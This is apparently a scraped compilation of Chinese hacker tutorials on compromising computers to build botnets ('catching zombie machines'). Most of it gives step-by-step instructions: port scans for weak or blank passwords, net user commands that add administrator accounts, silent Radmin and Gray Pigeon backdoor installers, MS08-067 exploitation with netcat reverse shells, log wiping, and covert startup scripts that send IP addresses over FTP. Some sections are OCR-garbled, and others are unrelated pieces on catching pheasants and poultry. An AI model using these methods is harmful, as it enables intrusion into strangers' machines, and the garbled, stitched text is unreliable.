各端口抓肉鸡的几种方法
肉鸡 教程
二.WIN2000终端服务客户端(没这个怎么叫3389肉鸡呢?)
三.CleanIISLog.exe,榕哥的清日志的好东东!^o^(又买广告呢)
四.SQLEXEC.EXE
(以上软件均在本站有下载)
下面该玩点什么呢?打开他的浏览器,去你知道的黑软地址下载你想用的工具,什么?装个流光?哈哈!~~`目标太大了吧?还是下个X-SCAN算了,下个IP炸弹??呵呵!好主意,`炸你的情敌去吧!用他下载的X-SCAN帮你去找更多的肉鸡!1YEAH!如果你在上面运行了程序,你退出时就只关终端窗口右上角的X就行了,关掉后你的程序还在运行呢!明天睡醒了来收你的战果吧!如果你要全部退出,就按开始--》关机--》登出****(你的帐户)。
错误口令次数: 0次
成功登录次数: 9次
用户ID: 0x000001f4, 组ID: 0x00000201
欢呼吧,!!!!!!!(如果看到“详细资料”里的帐户类型不是管理员的话,就找下一个吧,反正扫描报告多得很,总会找到一个的,我就试过扫描一次,就扫到了十多个这样的帐户,呵呵!~~)
知道了管理员的帐户是:Administrator,口令是空!到这时候,这台NT主机已差不多可以说是你的啦。
再来,在自己的命令提示符下依次输入:
D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去)
命令成功完成。
D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下,有时会拒绝访问的,就拷到其他目录下吧)
灰鸽子内网各种方法
其实问题主要是网络的结构问题的理解上面了灰鸽子(服务端)要求你的条件是对方(控制端)的ip(你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的:外网的ip是怎么样的?要求不是192.168.x.x开头,10.10.x.x也不行,这两种ip是校园网等的内网常用的ip通常你们在网吧是不可能令到灰鸽子上线的,一般来说只有是家庭的adsl才有可能是公网的了。
(一般来说其它的可能都是不多的,例如:一些校园网内部的服务器,他们的ip是公网的,是不同的)你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的,虽然他们说的是可行的,但是他们不说实现的条件. 但是事实上你们没有这样的条件的!至于申请域名的事情是对于你自己的ip来说的。
(我一会儿具体补充)但是要明白对方(控制端)的ip也是内网的话,你是没有办法的。
比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50这个221.4.188.50是几十人到几百人在用的,是用到nat技术的网络(至于什么是nat,我不说了啦,你们去网上查查把)。
你永远也不可能直接连接到我的,(直接?)你要连接到我只有一种可能:(间接连接:中间通过一个外网的服务器,下面的讲解联系到灰鸽子自带的端口映射工具。
方法:生成映射服务端,放到他们学校的服务器。
不一定要控制他们学校的服务器。
上线地址填被你控制机器的IP。
)就是你控制了我们学校的一些服务器:ip是202.192.240.0这个网络的电脑是公网的.你就可以通过他连接到我而且还要我告诉你我的ip是什么才行啊.因为你永远也不知道我的内网ip是什么.除非你控制了我们的路由器.至于对方的ip是192.168.x.x这个也是一样的原理.你永远不会连接到它,除非....(我上面说了拉)至于自动上线的条件麻,就是多了一个:(其实自动上线的话,是令到你的肉鸡直接连接到你(你的ip)!!!什么?你的ip会变化的?这时候就用到域名了。
懒就懒到底—利用08年最强系统漏洞批量抓肉鸡
,
一
。
溢 出后 木马
.
一
。
是 G h Os t 甲壳 虫 木 马 。 先 对 木 马 进 行 免 杀 等 各 种 操 作
。 .
“
。
≯
小提示
fP 段 。 可 以 在 O Q
”
。
“
设 置 要 扫 描 溢 出 的 JP 地 址 段 时 , 最 好 选 择 些 在 线主 机 多 的 中 通 过 查 IP 工 具 查 看 某 个 Q Q 好友 的 IP 地 址 , 从 而
—
6 7
“
溢 出 全 自动
”
”
工具 ( 下
,
,
.
分别名为
tx t
”
、
IP 1
”
.
.
“
IP 2 t x t
用记 事本打 开 文件后 添加 要 扫 描 的地 址 段 即可 ( 如 图 1 ) 注意 每个 文件
。
。
等
。
,
段 IP I I 可 而 且 IP 地 址 段 范 围 不要 太长 否 则 成 功率不高 般 段 中 包 含 5 万 个 IP 地 址 就 够 了
一
”
“
”
.
,
“
”
“
”
.
.
,
确 定 IP 地 址 段
,
这 样 扫 描 到 的在 线 主 机 比 较 多 。
“
”
。
.
e c
ho ho ho
o
p
e n
2 2 0 172 2 28 17 7
. .
> c c
1 da t
.
设 置 F T P 木 马 上 传服 务器
灰鸽子配置内网上线批量扫135抓鸡详解加图
灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明第一:先打开灰鸽子(如图1)初始界面。
现在开始配置服务端(如图2)其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径!注:本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射!介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============打开工具以后点下一步它会自动查找UPNP设备 (去掉忽略ICF防火墙前面的勾~)查找出设备后(如图4)下一步开始设置(如图5)设置好后下一步提示添加映射端口成功!(如图6)映射成功后不要关闭工具!==============================================================配置好服务端以后接下来测试一下鸽子是否能上线!只要运行一下(如图7)鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡!!用十段S扫描器扫几段IP(如图8)开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)呵呵还不少呢~~扫完以后DOS界面会自动关系在文件目录下出现一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个的文件!(如图10)找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了!(如图11)就先扫到这里其实还有好多呢!!关闭NTscan以后会在目录下自动建出一个的文件里面还是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成!不用说大家因该都会。
处理后的IP 连空格都需要去掉!(如图12)筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开!(如图13)点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确!把刚才找到的文件后缀改成lst为呵呵这个工具只能后缀lst的文件所以要改一下后缀改好后打开工具导入开始过滤!(如图14)下一步导出过滤好的IP另存为文件!操作到这里已经一大半了全是批量处理还不是累就是耗时间接下来是最重要的部分了就是批量传马了废话不多说继续!我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了!(如图15)是我简单架设的FTPFTP架设好以后配置一下JS脚本!(如图16)安装批量传马的工具安好后运行配置(如图17)打来—>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)哈哈还有一个德国小鸡~~==============此文章只供参考学习若使用给别人带来损失本人概不负责==============OK教程到此结束,请不要用于非法用途哦。
新手抓鸡方法大全
新手抓鸡方法大全2009-09-09 01:02抓鸡很多人都会,但不一定全会,今天,我对所有方法做总结,也会介绍!首先是端口抓鸡,一般比较常用!有3389、1433、445、139、135等3389端口抓鸡工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)二.用SQLTOOLS连上去建一个用户net start telnet开telnet服务net user mint mint /add添加用户mint密码为mint net localgroup administrators mint /add将帐号mint升级为管理员三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)制作RAD.EXE过程:1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;2、在本地设置服务端(一定要生成);设置密码-->>设置连接端口(默认4489)-->>生成3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg;4、编写一个批处理,并命名为u.bat;@echo offnet stop r_server5、写第二个批处理,r.bat,内容为:@echo [url=mailto:off@Explorer.exe]off@Explorer.exe[/url] / uninstall /silence@Explorer.exe /install /silence@regedit /s 1.reg@echo[url=mailto:off@Explorer.exe]off@Explorer.exe[/url] /uninstall / [url=mailto:silence@Explorer.exe]silence@Explorer.exe[/url] /install /silence@regedit /s 1.reg@net start r_server@delrad.exe@del 1.reg@del r.bat@del u.bat6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat 压缩成Rad.RAR压缩包;7、将Rad.rar制作成自解压文件;选择Default.sfx的自释放模块-->>高级自释放选项-->>常规释放路径:%systemroot%\system32安装程序:释放后运行:r.bat 释放前运行u.bat-->>摸式缄默模式:全部隐藏覆盖方式:覆盖所有文件-->>确定-->>确定生成完成。
黑客常用的攻击方法以及防范措施
黑客常用的攻击方法以及防范措施1.密码暴力破解包括操作系统的密码和系统运行的应用软件的密码,密码暴力破解方法虽然比较笨,成功几率小,可是却是最有效的入侵方法之一。
因为服务器一般都是很少关机,所以黑客就有很多时间暴力破解密码,所以给系统及应用软件起一个足够复杂的密码非常重要。
2。
利用系统自身安全漏洞每一次严重的系统漏洞被发现,都会掀起找肉鸡(被入侵并被安装了后门的计算机)热,因为这类入侵经常发生在系统补丁发布与客户部署更新这个时间段里,所以在第一时间内给系统打上补丁相当重要,这就要求广大的网络管理员了解关注这方面的信息。
3。
特洛伊木马程序特洛伊木马的由来:大约在公元前12世纪,希腊向特洛伊城宣战。
这是因为特洛伊王子劫持了Sparta国王Menelaus的妻子Helen(据说是当时最美的女子).战争持续了10年,特洛伊城十分坚固,希腊军队无法取得胜利。
最终,希腊军队撤退,在特洛伊城外留下很多巨大的木马,里面藏有希腊最好的战士.特洛伊城的人民看到这些木马,以为是希腊军队留给他们的礼物,就将这些木马弄进城。
到了夜晚,藏在木马中的希腊士兵在Odysseus的带领下打开特洛伊城的城门,让希腊军队进入,然后夺下特洛伊城。
据说“小心希腊人的礼物”这一谚语就是出自这个故事.特洛伊木马是指一个程序表面上在执行一个任务,实际上却在执行另一个任务。
黑客的特洛伊木马程序事先已经以某种方式潜入你的计算机,并在适当的时候激活,潜伏在后台监视系统的运行,执行入侵者发出的指令,木马程序是一种计算机病毒,也叫后门程序。
4.网络监听网络监听工具原来是提供给网络管理员的管理工具,用来监视网络的状态,数据流动情况,现在也被网络入侵者广泛使用。
入侵者通过在被入侵的计算机上安装Sniffer软件,可以捕获该网段的敏感信息,其中包括一些明文密码,并对数据包进行详细的分析,就有可能对该网段其他的计算机产生安全威胁,所以说网络监听造成的安全风险级别很高。
利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡说明:(1)由于扫描出来的结果比较少,所以直接看就可以了。
如果结果比较多,可以到sfind扫描目录下直接打开sfind.txt 扫描结果。
注意:(1)在溢出过程还有多种提示例如“Make SMB Connection error:64”(2)出现“Maybe Patched!”提示的计算机也可能溢出成功。
(3)仅仅对台湾和简体中文版本有效,对其他版本的服务器及时存在445漏洞也无法溢出,原因是操作系统溢出点内存地址不同。
3.监听“4444”端口在执行扫描的计算机上使用nc监听4444端口,具体命令为“nc –vv ip地址4444”,例如“nc –vv 218.69.*.2 4444”,一次不成功的溢出显示结果为“nc -vv 218.22.27.71 4444Warning: forward host lookup failed for : h_errno 11002:TRY_ [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”,这说明218.22.27.71可能已经安装补丁、防火墙禁止对外进行连接等情况,导致溢出不成功。
说明:在MS08067中可以定制监听端口,不过那个端口需要在源程序中定制。
4.继续进行溢出将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载,然后可以在反弹的Shell中执行下载的文件。
在本次渗透过程中,由于是相邻IP,因此使用了一个简便的方法,即单击“开始”-“运行”,在其中输入“\\IP\admin$”或者“\\IP\C$”并确定,如图6所示,如图能够连接,则会出现一个输入网络密码的提示框,在用户和密码中分别输入刚才添加的用户名。
8.获取系统详细信息以及执行各种命令使用MS08067溢出工具成功溢出服务器后,还可以使用“telnet IP地址4444”连接被溢出服务器,如图8所示,偶使用telnet进行了尝试,获取系统信息并开放了3389端口。
不同端口的入侵方法
21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
135端口
135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。
网上教程非常多,不多说了。
137端口
137端口统共NetBIOS 数据报(UDP)服务。
139端口
139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
电媒捕野鸡
关于电媒引野鸡方法技术关于电媒引野鸡体会(决对是不是网上抄来的哦)不管是新手,还是有经验者,都反应野鸡很难引来。
这是为什么呢!网上有说,全国野鸡的亚种很多的,也有说野鸡很精的,更有说野鸡电媒是抓不到。
一定要用鸡媒的。
以下我们就一起分析引不来鸡的原因:野鸡难抓,难在那里呢,说到底是在野鸡太精明,纯野生货先不说观察了,就想靠近都难,还有一点就是母野鸡很少会叫,就连老猎人一辈子也难得听上几次,就这更增加了对母音诱公使用难度。
本人体会野鸡确实是很精的,特别是对声音的判断。
本人用电媒KO公鸡无数,基本上是公的,偶也得公带母来打架被套到。
有时遇上性旺公鸡300米多远的距离飞来,找到电媒刚叫声地方,误差不会小于30厘米。
用母媒时,其实母媒跟本不用叫。
只要往天上一抛,母媒发出的扇翅风声,就能把几百米外的公鸡闻音引来。
关于野鸡亚种说法,本人不太支持。
在中国生长的野鸡,都为脖子上有白环的野鸡,不管南方北方,都一样。
公叫声都是“哥。
哥扑。
扑”。
这点大家都能认同.但母叫很多人认为不一样,我个人感觉也是,但这个不是因为亚种之类说法原因,而是因为母鸡小叫有很多种。
有种哑声叫的母叫为:母换小鸡的叫声。
叫这音时,大概1分钟叫一次,常见的就是带小鸡的母鸡,被冲散后。
唤儿女们叫声,想要听到这种叫声,得在鸡被冲散地方,人藏起来,静等5-10分钟才会有。
音圆润小叫声大概3分钟叫一次:这种多为换公或换母叫声。
大体主要有这两种,其他来说。
因为个体原因,音量稍有不同。
还有一点,就是很多学抓野鸡的朋友,都看过“日不落”吹野鸡哨的视频,视频真假我不作判断。
毕竟人外有人,天外有天,但这么要说2点,就是野鸡来的速度,不是每次像他视频里放的那样快。
有时要等上半小时也有可能。
另外放音不能太频繁要5分钟样子叫一声。
这两点误区一定要改过来。
不然想抓到野鸡很难的。
综合以上分析:电媒套鸡能不能引来野鸡,主要还在以下4点,只要这4点做到,野鸡一定会来。
能不到套到,就要看你下套的技术了,下套技术,在“抓野鸡技术”里有另有介绍。
妙用远程桌面批量捕捉“肉鸡”
一 一 、,
c 、 H 0 s、 肛 D 衄 、 I 1 m - -舡 EE
擅 长网页挂 马还 是 文件 捆绑 啊?” 听 了 笑着 回道 :“ 我 , 这
ห้องสมุดไป่ตู้
( D r- 8 快捷方 式生成 器》 ( ak 39 x 3 的小软件 , 并告诉 阿莱 我要 用它生 成一些快 捷方式。 阿 莱 不解 地 问这个 “ 快
捷方 式” 是什么 意思 , 叫他 我
个 …… , 些 老方 法 我 都 没 用 , 是 利 用远 程 桌 面来 捉 这 我
窗 口中按 “ t+ hf 组合 Cr S i” l t
键 , 换 到全拼 输入法 。 切 然 后用 鼠标 右 键 点击状 态条 上的微软徽 标 , 弹出菜单 在 中选择 “ 帮助” 里 的 “ 项 操作 指南” ( 图5 , 如 ) 打开 “ 输入法操
作指南 ” 的窗 口。
利用漏 洞巧登录
阿莱看了我的操作后 , 评价道 : 这 种破解方 法不错 ! “ 不过 它还 是属于普 通的暴力破 解 , 有没有什么技 术含量高点的方 法 啊? 我想 _ ” J
登录 … ・ ・ ”
在 此 窗 口的 “ 本 操 作 ” 基 列表 中, 鼠标 右 键任 意 点选 用
一
蒜㈣
t — 鞋 军 游 1 T 『' m T
然 后 在 “ 认 端 口”项 默 中输 入 3 8 ,“ 3 9 用户 ”项 中输入 最 常见 的 用户名
4 m 7 211 D 8 I 2 ̄I 0 C 0 P
黑 客 战 线
Ad ns ao ( 是W id ws mii rtr 这 t n o 系统 默 认 的用 户账 号) 最 后 。
点击 “ 密码 字典设 置 ” 后面 的 “ 项 打开 ” 钮 , 按 选择 一 个密 码
pc入侵各端口
42端口(溢出攻击)
扫描开了42端口主机保存为js.txt(只保留IP,空格和别的要过滤掉)
建立42.bat文件输入@for /f %%i in (js.txt) do ms -r %%i -t 0 -l 你的公网IP -p
2008
建立nc.bat文件输入@start nc -vv -l -p 2008
23端口(需要帐号好密码)
命令行下输入telnet ip,输入帐号密码进去了,得到的是cmdshell。
21端口(需要帐号好密码)
命令行下输入ftp ip,输入帐号密码进去了,假如有很大权限可以执行命令:
quote site exec "net user administrator /add" 增加帐号
同一目录下还需要放nc.exe sqlhello.exe工具
注意:以上的2008表示本机的监听端口(肉鸡溢出后会连接这个端口)
先运行nc.bat(多开几个)开2008端口监听,然后运行1433.bat
只要溢出成功,我们的2008端口上就回显一个cmdshell
67,2976端口(Symantec远程管理堆栈溢出)
下
输入telnet ip---输入帐号密码---得到cmdshell
139端口
扫描开了139端口的主机,用NTscan扫描IPC$共享过滤弱口令
假如过滤的用户名为administrator密码123,那么我们来建立连接
net use \\127.0.0.1\ipc$ 123 /user:administrator
进去后加一个new的用户密码为123
net user new 123 /add
所有关于灰鸽子上线以及抓鸡的教程
电信/Soft/html/11/22/2006/200603104908.htm
网通/Soft/html/11/22/2006/200603104908.htm
12、 内网鸽子上线绝版(无须影射)
网通/Soft/html/11/22/2006/200602244719.htm
26、 灰鸽子配置加内网路由器无权限上线
电信/Soft/html/11/22/2006/200602244717.htm
网通/Soft/html/11/22/2006/200602244717.htm
27、 原创-灰鸽子免杀之转换思路过卡巴
电信/Soft/html/9/88/2006/200602204682.htm
网通/Soft/html/9/88/2006/200602204682.htm
28、 灰鸽子简单免杀
电信/Soft/html/11/22/2006/200603064864.htm
网通/Soft/html/11/22/2006/200603064864.htm
21、 黑防鸽子服务端自动免杀器
电信/Soft/html/15/38/2006/200603064852.htm
31、 鸽子必备_DNS域名
电信/Soft/html/11/22/2006/200602194654.htm
网通/Soft/html/11/22/2006/200602194654.htm
32、 鸽子过卡吧内存免杀
电信/Soft/html/12/24/2006/200603094894.htm
网通/Soft/html/12/24/2006/200603094894.htm
抓鸡9种方法
抓肉鸡首先需要一个免杀的鸽子,别的木马也可以,这些论坛都有。
新手如果做不好黒防鸽子的免杀的话,建议换个别的木马,如守望者,上兴,PcShare.黑洞and so on.相对而言免杀比较好做。
免杀几乎是一切基础,所以一定要学好免杀,我们的“黑基论坛"的免杀方面很不错,新手朋友要多多学习了,多思考,多动手,多提问,相信你免杀会有很大的进步的,(*^__^*) 嘻嘻……这里讲解下原理和方法,不具体操作演示,不方便还要控制下教程的大小,另外重要的是我认为新手朋友应该多自己动手实践下,看别人的教程演示跟着一般的做是不会有什么很大的进步,要学习思路和原理,自己动手实践,在不断的解决困难中进步。
我走到今天的一点点感触,和新手分享下。
下面开始正题:以下内容需要回复才能看到1:扫3389端口抓肉鸡这个方法比较简单,适合新手朋友。
原理:国内流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是默认开放3389服务的,我们就可以利用这一点来抓肉鸡。
方法:扫描工具(如S等等)扫一段IP的3389端口,扫完后就直接用3389连接器连接开放3389的机器,也可以把结果保存为文本,用批量生成3389连接的工具生成链接,比较方便的,然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马然后安装。
这种方法只能是XP系统,如果遇到2000或者2003系统就不要试了,除非有输入法漏洞,不过现在很少了,还有那么多的3389,干嘛在它上面浪费时间呢。
汗- -!这个方法缺点也是大大的,XP只支持单用户登入,,你再登入上去就会把他挤出去,而且不可以抓国外的肉鸡。
建议:中午或者半夜行动,因为有很多的人会开着机子下载,杀毒啊,去睡觉。
我们就有可乘之机了。
(*^__^*) 嘻嘻……2:扫135端口抓肉鸡步骤:A:a-先用扫描器扫一段IP的135端口b-整理一下c-NTSCAN过滤有弱口令的机器d-最后用recton开telnet传马B:有一些自动抓鸡工具,功能类似,如Bluisland,Wmi,蜜蜂,知音等等,比较傻瓜化的。
常用的抓肉鸡方法
1.一般XP都很难扫不出IP,先要突破一下,可以用工具是“使xp支持syn扫描”,运行就重启。
线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"net stop sharedaccess",一般都可以扫出IP,如果还不行,换个IP段。
2.扫描环境一般都是XP系统,但其实扫描IP速度很慢,而且扫不多!我建议抓鸡最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统!3.抓鸡方法135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!因为这个漏洞很久,所以端口也很少的了!如果整理IP不好,就很难扫出弱口令。
1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server 弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了!3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new 密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马!4899端口,先扫描4899IP,然后整理!然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行!5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP 工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!80端口,先扫描80IP,然后整理,再用Apache Tomcat导入IP,端口8080改为80,等IP 全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS运行。
纯脚本套牢你的动态ip肉鸡教程
这样的话,所要执行的文件就写出来了,现在的问题是如何将执行文件的整个过程变的隐蔽,开始我想的是将这个批处理文件写到启动栏里,但是启动的时候黑黑的界面太危险,而且有循环的,人家不怀疑才怪呢!更糟的是不小心还会遗失自己的ftp密码。经过一段时间的搜索发现将脚本写入到组策略的启动脚本里就没有任何提示了!而且启动脚本比较隐蔽,一般个人用户都不会注意到这个地方,并且也很容易实现。我们分析启动脚本的配置文件C:\WINNT\system32 \GroupPolicy\Machine\Scripts\scripts.ini,注意这个文件当配置启动脚本时才会出现,并且有系统隐藏属性。文件如下:
ipconfig >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
time /t >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
date /t >C:\WINNT\system32\config\config.txt
ftp -n -s:"c:\WINNT\system32\system.ftp"
exit
:end
ping |find "Reply from"
废话不多说了,我们就一起来看看如何用脚本栓住肉鸡吧!首先,我们知道因为我们的肉鸡很特殊,不是长时间在线,我们不过是因为一些特别的原因而想要长期控制他,但是因为安全的原因不想用木马。我们的问题是肉鸡上线后如何在想得到他的ip的时候可以快速得到他的ip,(假设你已经开启了肉鸡的telnet或者其他的后门,只要知道ip就可以登陆)。这里,我用的方法是ftp,我也曾经想过用http的方法,但是实现的难度大点就不考虑了。这里,首先看这几个命令:
捉家鸡的方法和技巧
捉家鸡的方法和技巧
捉家鸡的方法和技巧可能因情境和鸡的性格而异,以下是一些建议,但请注意确保在捉捕过程中不伤到鸡或自己:
1.使用食物引诱:
•用一些鸡喜欢的食物,比如谷物、虫子或水果,引诱鸡靠近。
当它们靠近时,可以迅速伸手捉住。
2.在夜晚捉捕:
•鸡在夜晚通常会变得较为安静和温顺,因此在夜晚捉捕可能更容易。
使用手电筒或其他光源,悄悄接近鸡。
3.使用篮子或箱子:
•准备一个合适大小的篮子或箱子,悄悄地将篮子放在鸡的周围,迅速抓住鸡,将其放入篮子中。
4.使用捕鸟器具:
•有一些专门用于捉捕鸟类的捕鸟器具,如捕鸟网、捕鸟笼等。
使用这些器具需要技巧,确保在使用时小心谨
慎,以避免伤害鸡。
5.靠近鸡群中的弱者:
•如果有一群鸡,尝试接近群体中的较为温顺或较为弱小的个体。
它们可能更容易捕捉。
6.缓慢移动:
•鸡对快速移动和突然的动作可能感到紧张。
缓慢移动、轻声细语,避免引起它们的警觉。
7.利用结缰绳:
•对于已经被训练或习惯使用的鸡,可以利用一个长而轻的结缰绳。
悄悄地把绳子套在鸡的脖子周围,然后轻
轻拉紧。
请注意,捕捉鸡的过程需要耐心和谨慎,确保在任何时候都对鸡和自己都不会造成伤害。
此外,不同品种和个体的鸡可能对人的接触有不同的反应,因此需要根据实际情况调整捉鸡的方法。
低权限下实现VPN劫持的方法
0×00 前言早前疯子黑阔的事件引起了大家的关注,我想身为基友的我们也要保护下自己的资料吧,所以就在研究VPN劫持 (VPN Pivoting) 的技术,现在一般隐藏IP的方法是:1) 用免费或收费的VPN软件连接,Proxy,匿名浏览的网站等等,但这些服务商都会把大家的上网记录存在日志里,要追查时也很容易。
2) 一些基友会把肉鸡变成私人的VPN服务器,但需要提权和做很多设定,一些有硬件防火墙的服务器也未必能开启端口。
我就在想平时拿下的Webshell可否利用,经过不断的找寻和尝试后,终于成功实现了正向和反向的VPN劫持,以下是其优点:1) Webshell能执行命令即可,不用提权。
2) 默认的Network Service权限,或被降权为普通用户组皆可。
3) 除非服务器有安全策略或软件限制了用户的网络功能,一般能成功。
4) Windows 2003 / 2008 实测成功。
(2008 R2未测试成功,未知是否该服务器安全策略阻挡,待求证)5) 使用的软件名为PacketiX VPN,数千家大型企业在使用,不会被防毒软件阻挡。
0×01 正向VPN的建立利用环境:1) 一般在公司、学校、网吧等在内网不能在自己一方开启端口的情况下。
2) 目标服务器的443端口开启而未被占用,为什么是SSL的443呢? 这是最有可能已开启但未被使用的。
3) 如果端口不能使用,请看下一章「反向VPN的建立」。
好了,先打开VPN劫持工具包 -> Server目录,开启vpn_server.config档案,寻找“declare SecureNAT”,把Disabled参数更改为false,保存档案。
(请参阅「声明」部分)把vpnserver.exe (主程式) 、vpn_server.config (配置) 、hamcore.se2 (核心档) 上传到服务器,64位的主程式也在工具包中,以下的示范以Windows 2003进行,小菜把主程式更名为svchost.exe。
什么是肉鸡,如何避免电脑成为肉鸡?
首先要跟大家解释就是什么是肉鸡:肉鸡就是被黑客攻击和入侵,在电脑里面放入了病毒和木马之类的后门程序,拥有管理权限的远程电脑,受入侵者控制的远程电脑。
肉鸡可以是各种系统,如 windows2003、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。
我朋友告诉我,一天他利用这个漏洞成功抓到了 3000多台肉鸡,也就是说3000台电脑,成为了他的傀儡..虽然现在网络上流传了很多安全辅助软件,360卫士,金山卫士,360杀毒,瑞星杀毒,卡巴斯基杀毒等等.但是为什么还是有那么多人还是会沦为受别人控制的肉鸡呢?那么大家就有必要看看以下对如何避免电脑成为肉鸡的方法了。
几种常见的肉鸡挂马方法:1. Winrar压缩包攻击所谓的压缩包攻击,就是在压缩文件里捆绑一个木马或病毒,当打开的时候自动运行,一般这种攻击都是自解压格式。
这种情况经常在各大网站也经常出现,所以下载之前文件必须杀毒软件扫描一下。
2.自释放攻击某些软件内部自己带毒,在运行的时候自动释放.这种方式相对来说不是很多3.挂马攻击利用网站页面,挂马这种方式目前最多,但是难度也比较高,首先必须要入侵网站或者有网站管理权限才行4.端口扫描攻击借助扫描工具和漏洞利用工具,达到攻击的目的攻击的方法很多,这里就只是列出一部分,如果大家想了解黑客挂马的方法,建议大家百度一下,这里就不多说了。
